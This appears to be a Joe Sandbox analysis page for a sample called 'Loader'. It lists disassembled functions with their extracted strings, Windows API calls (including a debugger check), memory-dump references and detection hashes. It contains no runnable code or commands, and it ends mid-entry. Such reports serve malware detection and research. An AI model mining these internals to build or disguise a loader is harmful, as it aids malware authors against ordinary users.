Function 0042856C Relevance: 9.3, Strings: 7, Instructions: 519COMMON

Download Yara Rule

Strings

xlc=, xrefs: 00428938
TU, xrefs: 004287CE
M`af, xrefs: 004288BE, 004288CB
M`af, xrefs: 004287DA, 00428846
hi, xrefs: 004286FE
KJIH, xrefs: 004289B5
#z*>, xrefs: 004287D5

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: #z*>$KJIH$M`af$M`af$TU$hi$xlc=
API String ID: 0-3444116175
Opcode ID: c0baef34677e044ab247d2e5aac73f80a096439048c6999c4bcee056cd6db3af
Instruction ID: 7e836b9766b242f3fc3dd51180be0f2cab443d7991a9e66097dbc5a85011b6e9
Opcode Fuzzy Hash: c0baef34677e044ab247d2e5aac73f80a096439048c6999c4bcee056cd6db3af
Instruction Fuzzy Hash: 0BD14775609321CBC3149F18D85166FB3F1EF86314F444A2DF9D69B3A0EB789905CB8A

Function 00428630 Relevance: 9.3, Strings: 7, Instructions: 514COMMON

Download Yara Rule

Strings

xlc=, xrefs: 00428938
TU, xrefs: 004287CE
M`af, xrefs: 004288BE, 004288CB
M`af, xrefs: 004287DA, 00428846
hi, xrefs: 004286FE
KJIH, xrefs: 004289B5
#z*>, xrefs: 004287D5

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: #z*>$KJIH$M`af$M`af$TU$hi$xlc=
API String ID: 0-3444116175
Opcode ID: 8636f7f2d492a3864e0f02ebe2bf5754de26b4778162c7e19092fcca7101ddf1
Instruction ID: f976bc588ec640565c7012468651d5ffc8b69fa3d08ac8f64f271550ea2c12cc
Opcode Fuzzy Hash: 8636f7f2d492a3864e0f02ebe2bf5754de26b4778162c7e19092fcca7101ddf1
Instruction Fuzzy Hash: ADD13675609321CBC3149F18D85266FB3F1EF86314F444A2DF9D69B3A0EB789905CB8A

Function 004257AC Relevance: 9.3, Strings: 7, Instructions: 503COMMON

Download Yara Rule

Strings

KJIH, xrefs: 00425D12
x~, xrefs: 0042582C
xlc=, xrefs: 004259E5
KJIH, xrefs: 00425A65
xlc=, xrefs: 00425D67
tz, xrefs: 00425824
xlc=, xrefs: 00425C9A

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: KJIH$KJIH$xlc=$xlc=$xlc=$tz$x~
API String ID: 0-1340891752
Opcode ID: 63b6a7e1f9943a7ee3fba3336e57c65c80b2210d8cee09f5dd92498206add450
Instruction ID: 4b9b57266fa6f88c6c86b47bd8eb3fb309f79ef555365d41f88ab1d7a07e1ec3
Opcode Fuzzy Hash: 63b6a7e1f9943a7ee3fba3336e57c65c80b2210d8cee09f5dd92498206add450
Instruction Fuzzy Hash: 77F16579A0C350DFD3248F55E88172BBBE1FBCA314F95482DEA859B351D7749802CB8A

Function 00426430 Relevance: 9.1, Strings: 7, Instructions: 396COMMON

Download Yara Rule

Strings

xlc=, xrefs: 00427190
SDTB, xrefs: 004270A2
sNDW, xrefs: 004270F5
WLTO, xrefs: 004270D9
BC, xrefs: 00426EE5
DTS^, xrefs: 004270C3
no, xrefs: 00426DE7

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: BC$DTS^$SDTB$WLTO$no$sNDW$xlc=
API String ID: 0-4261215005
Opcode ID: ccdc102990b4c15d3359c4579d9af196d84240e8b5d2da791b71984c89447364
Instruction ID: bc51c2f3923f1d1749b79aa7f72e467a3002caf565e53d3967ace05a6b2d116c
Opcode Fuzzy Hash: ccdc102990b4c15d3359c4579d9af196d84240e8b5d2da791b71984c89447364
Instruction Fuzzy Hash: F3D1F0B5A0C3908FD7309F24E8917ABB7F1EB96304F45482DE5C99B252DB748905CB8B

Function 00429070 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 186COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00429149

Strings

zPf?, xrefs: 00429157
~Pf?, xrefs: 004291BD

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: zPf?$~Pf?
API String ID: 237503144-2637493059
Opcode ID: 26d119dec0a38fc1d7c433e7bb48d8e841ee7a0981e4bddc7203521b33e83297
Instruction ID: 198dd5e36b7fe1fa964ce911b4fb16a36b701d1aa9f0cceef3b71a0ea0f726ca
Opcode Fuzzy Hash: 26d119dec0a38fc1d7c433e7bb48d8e841ee7a0981e4bddc7203521b33e83297
Instruction Fuzzy Hash: EB514675648305EFE3108F25AC81B6BB7A8FBC2704F50193DFA509B291DBB4D81ACB56

Function 00A81A07 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00A813BD,00000002,00000000,?,?,?,00A813BD,?,00000000), ref: 00A81AA0
GetLocaleInfoW.KERNEL32(?,20001004,00A813BD,00000002,00000000,?,?,?,00A813BD,?,00000000), ref: 00A81AC9
GetACP.KERNEL32(?,?,00A813BD,?,00000000), ref: 00A81ADE

Strings

OCP, xrefs: 00A81A5B
ACP, xrefs: 00A81A25

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 47cbf9afaa400a01a0d178d794edea5d8a7b7e3aa207ba30393524f5181ce3ad
Instruction ID: f3a3c339105a04fc864aaafe16e605ec371b9e0530cff40077efbe93b58ca208
Opcode Fuzzy Hash: 47cbf9afaa400a01a0d178d794edea5d8a7b7e3aa207ba30393524f5181ce3ad
Instruction Fuzzy Hash: E7218672B02100AAEB3DEF64C901A97F3AEEF54FD4B968465E90AD7104E732DD42C350

Function 0041D5B0 Relevance: 8.5, Strings: 6, Instructions: 1030COMMON

Download Yara Rule

Strings

klSm, xrefs: 0041D930
iWDB, xrefs: 0041D948
+, xrefs: 0041DD87
wJsU, xrefs: 0041D938
JSQC, xrefs: 0041D974
J_\e, xrefs: 0041D969

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: +$JSQC$J_\e$iWDB$klSm$wJsU
API String ID: 0-48882314
Opcode ID: 6b08c17d73f50599bc3423449fc688f48cd1f5fde1254425c14f9c76bad262bb
Instruction ID: 6539de25e02be62e166c2d6d1fbf72afe4b3ae9106669352150e090de26398d0
Opcode Fuzzy Hash: 6b08c17d73f50599bc3423449fc688f48cd1f5fde1254425c14f9c76bad262bb
Instruction Fuzzy Hash: 1B72597090C3518FC725CF29C8406AFBBE1AF95314F188A6EE8E58B392D738D946C756

Function 00A61FB0 Relevance: 7.7, APIs: 5, Instructions: 200fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A61240: _strlen.LIBCMT ref: 00A612BA

GetFileSize.KERNEL32(00000000,00000000), ref: 00A62046
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00A6206B
CloseHandle.KERNEL32(00000000), ref: 00A6207A
_strlen.LIBCMT ref: 00A620CD
CloseHandle.KERNEL32(00000000), ref: 00A621FD

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: CloseFileHandle_strlen$ReadSize
String ID:
API String ID: 1490117831-0
Opcode ID: d4f9dd3fc68fb1d76d3c49847b05aa267e14e1d22a9df3488f6a8bd1e3995c2c
Instruction ID: f9dfcd79ecc4fb36fd59339d90cfed842ed2653c4f0da184a95053e8f49ab613
Opcode Fuzzy Hash: d4f9dd3fc68fb1d76d3c49847b05aa267e14e1d22a9df3488f6a8bd1e3995c2c
Instruction Fuzzy Hash: 8171D0B2D006189FCB10DFA8DC44BAEBBB5FF49320F184629E815B7391E7359945CBA1

Function 00A81287 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A7C16A: GetLastError.KERNEL32(00000000,?,00A7E58D), ref: 00A7C16E
Part of subcall function 00A7C16A: SetLastError.KERNEL32(00000000,?,?,00000028,00A78363), ref: 00A7C210

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00A8138F
IsValidCodePage.KERNEL32(00000000), ref: 00A813CD
IsValidLocale.KERNEL32(?,00000001), ref: 00A813E0
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00A81428
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00A81443

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: aa92ca92b96489825536cdb5e59e60795c159193b23bc5de80c436e1842d7069
Instruction ID: 75313aa3c67ed755d0fa03882aff39850491ab4a549f03f296c0b854ce07372f
Opcode Fuzzy Hash: aa92ca92b96489825536cdb5e59e60795c159193b23bc5de80c436e1842d7069
Instruction Fuzzy Hash: 84516CB1A00219ABEB20EFA5DD45EBE77BCFF05740F544429F915EB190EB709A428B60

Function 0041B9A0 Relevance: 6.8, Strings: 5, Instructions: 597COMMON

Download Yara Rule

Strings

YF, xrefs: 0041BF7A
IG, xrefs: 0041BB2B
w, xrefs: 0041BB33
C@, xrefs: 0041BC38
>j%h, xrefs: 0041BF90

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: >j%h$C@$IG$YF$w
API String ID: 0-3977256543
Opcode ID: b1c41823cc40404da43d45bdcbf5a05d767afae4a0658e6817707d5df229ca96
Instruction ID: bddec1b54a39677e85b17c04ceb6ad18fd944dcb43d24b0713774ccf1a2472f2
Opcode Fuzzy Hash: b1c41823cc40404da43d45bdcbf5a05d767afae4a0658e6817707d5df229ca96
Instruction Fuzzy Hash: A302107260C3408BD704DF69C8516ABFBE2EFD6314F09882DE4D58B392E7389545CB9A

Function 00A79CC0 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
Instruction ID: fd8cd92b472d63cb3222eb019da2d4f960f3aaaa87cb0d36c90cea5f3dd368b0
Opcode Fuzzy Hash: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
Instruction Fuzzy Hash: 4D023C71E012199BDF14CFA9CD80AAEB7B5FF98314F24C26AD519E7341D731A941CB90

Function 00A81FE9 Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A820D9

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: fab0d0d7a906a1ae0d829601c3077758eed10a8c2442d6b1cafd20b3d5aa9ad6
Instruction ID: 6c5c6b2e54414649ba7908a5b7780143076792ce42a72b28e6608f1eb6dd454f
Opcode Fuzzy Hash: fab0d0d7a906a1ae0d829601c3077758eed10a8c2442d6b1cafd20b3d5aa9ad6
Instruction Fuzzy Hash: D271D1B1905168AEDF21FF649D8DBFAB7B9AF05300F1482DAE548A7251EB314E858F10

Function 00A6F8E9 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00A6F8F5
IsDebuggerPresent.KERNEL32 ref: 00A6F9C1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A6F9DA
UnhandledExceptionFilter.KERNEL32(?), ref: 00A6F9E4

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 914e706b6d3369d806d90a80cd78db4af98297183f8037acd38a152d37cc6cef
Instruction ID: 52f410eaa349c78825ceb16ab6e5e30e719a5c3727eb7543ceed0797c9f5862b
Opcode Fuzzy Hash: 914e706b6d3369d806d90a80cd78db4af98297183f8037acd38a152d37cc6cef
Instruction Fuzzy Hash: 7D31F7B5D012199BDF21DFA4DD497CDBBB8AF08300F1041EAE40CAB250EB719A858F45

Function 00417207 Relevance: 5.4, Strings: 4, Instructions: 423COMMON

Download Yara Rule

Strings

Oslm, xrefs: 00417589
L4, xrefs: 00417600
3wA, xrefs: 00417515, 0041772D
L4, xrefs: 004172E0

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeThunk
String ID: 3wA$Oslm$L4$L4
API String ID: 2994545307-2234767502
Opcode ID: 82bf725f0757daa157f32e025d8a74b38d6c37187c90028344b6b4186a80b1bb
Instruction ID: 307d0b6bb99e80c2126adcaddeb59da55b998df86b0f55e95dd8da5ebd5bfe2f
Opcode Fuzzy Hash: 82bf725f0757daa157f32e025d8a74b38d6c37187c90028344b6b4186a80b1bb
Instruction Fuzzy Hash: BFD147716083419FD724CF28C8817ABB7E2ABC6314F188A3DE4D983392D735D856CB86

Function 00415506 Relevance: 4.1, Strings: 3, Instructions: 328COMMON

Download Yara Rule

Strings

gfff, xrefs: 00415694
WT, xrefs: 004155E0
7, xrefs: 00415649

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: 7$WT$gfff
API String ID: 0-3918836065
Opcode ID: c1e1d21124b2e52469f7f82df4301e15a45ac8879c3b69de27b99dc034c8f0a4
Instruction ID: b46a7ac6f51d3cab31650695944aba32df2089761ef6db5e6300506385caa733
Opcode Fuzzy Hash: c1e1d21124b2e52469f7f82df4301e15a45ac8879c3b69de27b99dc034c8f0a4
Instruction Fuzzy Hash: D8A13A73A106008FD318CA29CC517FBB7D3ABC5324F1AC63ED456CB2D9EA3898468785

Function 0041A3A0 Relevance: 3.9, Strings: 3, Instructions: 173COMMON

Download Yara Rule

Strings

Ju, xrefs: 0041A428
tu, xrefs: 0041A438
w~, xrefs: 0041A430

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: Ju$tu$w~
API String ID: 0-2718015323
Opcode ID: a8a042c75a796f11769dd960a33e4198fe42849cae9fa5f40045990e2e3e9ece
Instruction ID: 3c52c23171b1d345c2d49e998851337e4974a2c3d886fd1ac3d2f2ae50b48a00
Opcode Fuzzy Hash: a8a042c75a796f11769dd960a33e4198fe42849cae9fa5f40045990e2e3e9ece
Instruction Fuzzy Hash: 6F41AA700093918BC724CF29C8606BBBBE0EF83364F04495DE5D28B291E3BD9945CB97

Function 0042963E Relevance: 3.9, Strings: 3, Instructions: 150COMMON

Download Yara Rule

Strings

KJIH, xrefs: 004296D0
xlc=, xrefs: 00429656
xlc=, xrefs: 00429737

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: KJIH$xlc=$xlc=
API String ID: 0-3693430147
Opcode ID: ddcbebc37588f3223e6456a98ecf1037c94c59a38205b2405806e0036c004e6d
Instruction ID: 1df2b0cd354e5eb9382eacdd7d6201147e9d1f654fc09427a9397325319c904e
Opcode Fuzzy Hash: ddcbebc37588f3223e6456a98ecf1037c94c59a38205b2405806e0036c004e6d
Instruction Fuzzy Hash: 4441F53AB69724DBC7289F59ECC152AF7E1EB99710F84543ED982DB311C728DC01878A

Function 00426639 Relevance: 3.1, Strings: 2, Instructions: 613COMMON

Download Yara Rule

Strings

kim}, xrefs: 00426689
@gB, xrefs: 00426820, 00426B5F

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: @gB$kim}
API String ID: 0-565826954
Opcode ID: b9771cc6a1c9dc5aa759e40e45813aeb6d2542078393295f4b3fb4169dc1c76f
Instruction ID: 9883a33267a4edeb7d73dc9f2210c431252dad24f6d1f8ca6899b908e8f0c5d9
Opcode Fuzzy Hash: b9771cc6a1c9dc5aa759e40e45813aeb6d2542078393295f4b3fb4169dc1c76f
Instruction Fuzzy Hash: 1E225875E04265CFCB14CF68D8916AEBBB1EF49304F1980AED851AB352C739AD06CBD4

Function 0040E49F Relevance: 2.8, Strings: 2, Instructions: 259COMMON

Download Yara Rule

Strings

p{-s, xrefs: 0040E768
p{-s, xrefs: 0040E5E5

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeThunk
String ID: p{-s$p{-s
API String ID: 2994545307-716220686
Opcode ID: 2aef8b8498d302ea470229f2b31964dafa280691521ba20ab2529de80153c117
Instruction ID: f0c58c42614237375e365d72bc3c7a37cc96942c1005d0a9fe5c86925e2313ea
Opcode Fuzzy Hash: 2aef8b8498d302ea470229f2b31964dafa280691521ba20ab2529de80153c117
Instruction Fuzzy Hash: 48810435240601AFC728CB29CD92672B7E2EB8530871C8D7FD156D76A6D73DE8229B08

Function 004142A0 Relevance: 2.4, Strings: 1, Instructions: 1107COMMON

Download Yara Rule

Strings

D]+\, xrefs: 004149E0

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: D]+\
API String ID: 0-1174097187
Opcode ID: 0d41e0e1d96c0d5275cbc1ccfd3832cd9580ac32bd5875f1c036d976f95b2d15
Instruction ID: 9251f9772932f48160a5ade6cb9760e2072f5487641182bc89e2b62d99dc5cf9
Opcode Fuzzy Hash: 0d41e0e1d96c0d5275cbc1ccfd3832cd9580ac32bd5875f1c036d976f95b2d15
Instruction Fuzzy Hash: C45224B9A18200ABD714DF14D84167BB7E1FBD6314F19892EE88197391D73CEC41CB9A

Function 00415E9A Relevance: 1.7, Strings: 1, Instructions: 496COMMON

Download Yara Rule

Strings

z, xrefs: 00416241

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeThunk
String ID: z
API String ID: 2994545307-1657960367
Opcode ID: c7a99f6c6c6413b9328a1f415840cf05a1af755a24bae09dd66a052c86edf477
Instruction ID: a41510cab639ff2c168ed1a461397d8e6c98ec91fc98b876038bb987118f98da
Opcode Fuzzy Hash: c7a99f6c6c6413b9328a1f415840cf05a1af755a24bae09dd66a052c86edf477
Instruction Fuzzy Hash: 7FD12934A083409FD724CF2598907BBB7E2EBDA314F19592EE0D657291C738D847CB5A

Function 004393D0 Relevance: 1.7, Strings: 1, Instructions: 454COMMON

Download Yara Rule

Strings

056w, xrefs: 004394F9

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeThunk
String ID: 056w
API String ID: 2994545307-3031594284
Opcode ID: d41cf2aced06695c6dce53ea779f2bf54988cbc4b145618bc2f0dedb8f096e31
Instruction ID: 1e524d56f986b60e63968127200a34d937c12baad4a8d406414dac60ed768612
Opcode Fuzzy Hash: d41cf2aced06695c6dce53ea779f2bf54988cbc4b145618bc2f0dedb8f096e31
Instruction Fuzzy Hash: C0C17A72A083005BD3249E24CCC277BB7A2EBCA314F18A52ED59557391D6BCDC46C79A

Function 00421B00 Relevance: 1.7, Strings: 1, Instructions: 440COMMON

Download Yara Rule

Strings

\l, xrefs: 00421E41

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: \l
API String ID: 0-332606932
Opcode ID: 2dec8be2b520b2186125d96ced5c0adb923a6fa7d4cda33570fed64b2fe6fc8e
Instruction ID: 852c598ae3c60e65e129f9c36e5a4a5eb34ebc179e5d94f45104046a45fe5565
Opcode Fuzzy Hash: 2dec8be2b520b2186125d96ced5c0adb923a6fa7d4cda33570fed64b2fe6fc8e
Instruction Fuzzy Hash: E7B18D72A143209BD7249F24AC82677B3B1EFA1314F99852EECC557351E23CEC05C79A

Function 00417AB8 Relevance: 1.6, Strings: 1, Instructions: 330COMMON

Download Yara Rule

Strings

_, xrefs: 00417E13

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: c3dfae79088f6faf2fd2d7b366d4b356a6ca7e7aafd60081d9beaeb1768c1e58
Instruction ID: 2874f46035bf117a80d7d2a23349d9cb71d49021efdfc033c4a59cdebb79e407
Opcode Fuzzy Hash: c3dfae79088f6faf2fd2d7b366d4b356a6ca7e7aafd60081d9beaeb1768c1e58
Instruction Fuzzy Hash: 86B1F77560C3408BD7258F2898617FBBBF2ABDA314F28497ED4C687382D7389851875A

Function 00440450 Relevance: 1.5, Strings: 1, Instructions: 295COMMON

Download Yara Rule

Strings

/4-", xrefs: 00440452

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeThunk
String ID: /4-"
API String ID: 2994545307-255669811
Opcode ID: f4558d96d5aa098eeacb25ccd83ed2fcdbbf09adccc6b57ad2e83dd542a83ca3
Instruction ID: 5d47b2a4792fb15c73dd9788517ba42da93c73d11f813630f87d1316b5251ac7
Opcode Fuzzy Hash: f4558d96d5aa098eeacb25ccd83ed2fcdbbf09adccc6b57ad2e83dd542a83ca3
Instruction Fuzzy Hash: B8913835604311AFE720DF28C88066BB7E2EFD4750F19852DEA815B395DB39EC62C785

Function 0042B8BD Relevance: 1.4, Strings: 1, Instructions: 198COMMON

Download Yara Rule

Strings

c`^Z, xrefs: 0042BA6B

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: c`^Z
API String ID: 0-4018570465
Opcode ID: 9eaaeac1af0046f77bfdce008b90eb0f0d12110f4699f489367c40e366593788
Instruction ID: 84572387e2f9d8e30e4a59fcb4903cfd6437d21f2140ce11b4878cf53556221a
